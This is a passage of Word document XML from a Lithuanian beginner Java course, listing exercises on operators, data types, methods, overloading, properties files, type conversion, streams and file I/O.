      <w:r w:rsidR="00577F29">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>12 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. SUKURKITE JAVA </w:t>
      </w:r>
      <w:r w:rsidR="00F95DDD" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>KLASĘ VARDU JAVAOPERATORS.JAVA</w:t>
      </w:r>
      <w:r w:rsidR="006F1DA8">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Klasė turi būti patalpinta į paketą vardu javabasics. Darbą galite atlikti tekstiniame redaktoriuje arba IDE. Sukurtoje klasėje turi būti panaudoti Java operatoriai: +, -, /, *, %, ++, --.</w:t>
      </w:r>
      <w:bookmarkStart w:id="53" w:name="_Toc1580519250"/>
      <w:bookmarkStart w:id="54" w:name="_Hlk10737540"/>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>13 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKITE JAVA KLASĘ VAR</w:t>
      </w:r>
      <w:r w:rsidR="00F95DDD" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>DU JAVAPRIMITIVESDATATYPES.JAVA</w:t>
      </w:r>
      <w:r w:rsidR="006F1DA8">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Klasė turi būti patalpinta į paketą vardu javabasics. Darbą galite atlikti tekstiniame redaktoriuje arba IDE. Sukurtoje klasėje turi būti panaudoti Java primityvūs duomenų tipai: byte, short, int, long, float, double, char, boolean. Papildomai turi būti atspau</w:t>
      </w:r>
      <w:r w:rsidR="00B74FC9" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>sdintos šių duomenų tipų reikšmė</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>s pagal nutylėjimą ir reikšmių diapazonas kiekvienam duomenų tipui</w:t>
      </w:r>
      <w:bookmarkStart w:id="55" w:name="_Toc1611586644"/>
      <w:bookmarkEnd w:id="53"/>
      <w:r w:rsidR="006F1DA8">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>14 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKITE JAVA KLASĘ VARDU JAVAN</w:t>
      </w:r>
      <w:r w:rsidR="00F95DDD" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ONPRIMITIVESDATATYPES.JAVA</w:t>
      </w:r>
      <w:r w:rsidR="006F1DA8">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Klasė turi būti patalpinta į paketą vardu javabasics. Darbą galite atlikti tekstiniame redaktoriuje arba IDE. Sukurtoje klasėje turi būti panaudoti Java objekto (rodykliniai)</w:t>
      </w:r>
      <w:r w:rsidR="009E4F36" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> duomenų tipai: string, array. P</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>apildomai turi būti atspausdinta sukurto objekto nuoroda (Reference)</w:t>
      </w:r>
      <w:bookmarkStart w:id="56" w:name="_Toc860169033"/>
      <w:bookmarkEnd w:id="54"/>
      <w:bookmarkEnd w:id="55"/>
      <w:r w:rsidR="006F1DA8">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>15 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKITE JA</w:t>
      </w:r>
      <w:r w:rsidR="00762A46" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>VA KLASĘ VARDU JAVAMETHODS.JAVA</w:t>
      </w:r>
      <w:r w:rsidR="006F1DA8">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Klasė turi būti patalpinta į paketą vardu javabasics. Darbą galite atlikti tekstiniame redaktoriuje arba IDE. Klasėje realizuokite paprastą skaičiuotuvą, kuris moka sudėti, atimti, padauginti ir padalinti skaičius. Kiekvienam skaičiuotuvo veiksmui (+, -, *, /) parašykite atskirą paprogramę (method). Paprogramės turi mokėti priimti du skaičius ir grąžinti veiksmo rezultatą</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
      <w:r w:rsidR="006F1DA8">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc423464916"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>16 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKITE JAVA KLASĘ</w:t>
      </w:r>
      <w:r w:rsidR="003E1A1A" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> VARDU JAVAMETHODSOVERLOAD.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basics. Darbą galite atlikti tekstiniame redaktoriuje arba IDE. Klasėje realizuokite įvairių geometrinių figūrų (kvadratas, apskritimas ir t.t.) ploto skaičiuoklę. Kuriant paprogrames turi būti panaudotas paprogramių perkrovimo (Overload) mechanizmas</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
      <w:r w:rsidR="006F1DA8">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>17 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> PARAŠYKITE FAKTORIALO SKAIČIAVIMO PROGRAMĄ, KURI NENAUDOJA REKURSIJOS</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i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>18 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. PARAŠYKITE FIBONAČIO SKAIČIŲ SEKOS SKAIČIAVIMO PROGRAMĄ, KURI NENAUDOJA REKURSIJOS</w:t>
      </w:r>
      <w:r w:rsidR="006F1DA8">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:before="480" w:after="160"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc1771198901"/>
      <w:bookmarkStart w:id="59" w:name="_Toc1754822951"/>
      <w:bookmarkStart w:id="60" w:name="_Toc10443964"/>
      <w:bookmarkStart w:id="61" w:name="_Toc13095513"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="62" w:name="_Toc13833407"/>
      <w:bookmarkStart w:id="63" w:name="_Toc14392422"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas. Kurti nesudėtingą programinį kodą</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
      <w:bookmarkEnd w:id="59"/>
      <w:bookmarkEnd w:id="60"/>
      <w:bookmarkEnd w:id="61"/>
      <w:bookmarkEnd w:id="62"/>
      <w:bookmarkEnd w:id="63"/>
      <w:r w:rsidR="006F1DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_Toc1702049751"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKITE JAVA KLASĘ</w:t>
      </w:r>
      <w:r w:rsidR="003E1A1A" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> VARDU JAVAPROPERTIESWRITE.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simple. Darbą galite atlikti tekstiniame redaktoriuje arba IDE. Sukurta klasė turi įrašyti nustatymų (parametrų) sąrašą (Properties) į failą. nustatymai, kurie turi būti įrašyti į failą: database, dbuser, dbpassword. nustatymų failo pavadinimas: config.properties</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
      <w:r w:rsidR="006F1DA8">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="_Toc336493466"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>2 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKITE JAVA KLASĘ VARDU JAVAPROPERT</w:t>
      </w:r>
      <w:r w:rsidR="003E1A1A" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>IESREAD.JAVA</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 Klasė turi būti patalpinta į paketą vardu javasimple. Darbą galite atlikti tekstiniame redaktoriuje arba IDE. Sukurta klasė turi nuskaityti nustatymų (parametrų) sąrašą (Properties) iš failo. Nuskaitomi nustatymai:</w:t>
      </w:r>
      <w:r w:rsidR="009E4F36" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> database, dbuser, dbpassword. N</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ustatymų failo pavadinimas: config.properties. Visi nustatymai turi būti atspausdinti komandinėje eilutėje</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
      <w:r w:rsidR="006F1DA8">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="_Toc520246410"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>3 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKITE JAVA K</w:t>
      </w:r>
      <w:r w:rsidR="003E1A1A" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>LASĘ VARDU JAVADATACONVERT.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lastRenderedPageBreak/>
        <w:t>Klasė turi būti patalpinta į paketą vardu javasimple. Darbą galite atlikti tekstiniame redaktoriuje arba IDE. Klasėje turi būti atlikti veiksmai su java duomenų konvertavimu: plėtimo (Widening), siaurinimo (Narrowing). Papildomai turi būti parašyta paprogramė, kuri nustato kintamojo objekto tipą naudojant operatorių instanceof</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
      <w:r w:rsidR="006F1DA8">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="67" w:name="_Toc848762013"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>4 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKITE JAVA KLASĘ VA</w:t>
      </w:r>
      <w:r w:rsidR="003E1A1A" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>RDU JAVAAUTOBOXINGUNBOXING.JAVA</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 Klasė turi būti patalpinta į paketą vardu javasimple. Darbą galite atlikti tekstiniame redaktoriuje arba IDE. Klasėje turi būti atlikti veiksmai su J</w:t>
      </w:r>
      <w:r w:rsidR="00660B99" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ava</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> duomenų konvertavimu: Autoboxing, Unboxing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67"/>
      <w:r w:rsidR="006F1DA8">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="_Toc1042262290"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>5 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKITE JA</w:t>
      </w:r>
      <w:r w:rsidR="005111A8" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>VA KLASĘ VARDU JAVASTREAMS.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simple. Darbą galite atlikti tekstiniame redaktoriuje arba IDE. Klasėje turi būti realizuotas vaisių pavadinimų įvedimas iš komandinė eilutės, vaisių parinkimas (filtravimas) pagal nustatytą požymį ir parinktų vaisių sąrašo spausdinimas komandinėje eilutėje. Vaisių sąrašas: bananas, ananasas, obuolys, kriaušė. požymis: vaisius turi raidę a</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
      <w:r w:rsidR="006F1DA8">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="69" w:name="_Toc1332981233"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>6 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKITE JA</w:t>
      </w:r>
      <w:r w:rsidR="005111A8" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>VA KLASĘ VARDU JAVABUFFERS.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simple. Darbą galite atlikti tekstiniame redaktoriuje arba IDE. Klasė turi nuskaityti tekstinį failą ir jo turinį išvesti į komandinę eilutę. Turi būti panaudotos standartinės JAVA klasės: File, FileReader, BufferedReader, StringBuilder</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/>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bookmarkStart w:id="70" w:name="_Toc953190187"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>7 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKI</w:t>
      </w:r>
      <w:r w:rsidR="005111A8" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>TE JAVA KLASĘ VARDU JAVAIO.JAVA</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 Klasė turi būti patalpinta į paketą vardu javasimple. Darbą galite atlikti tekstiniame redaktoriuje arba IDE. Klasė turi realizuoti tekstinio failo kopijavimą. Turi būti panaudotos standartinės java klasės: FileInputStream  ir FileOutputStream</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
      <w:r w:rsidR="006F1DA8">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
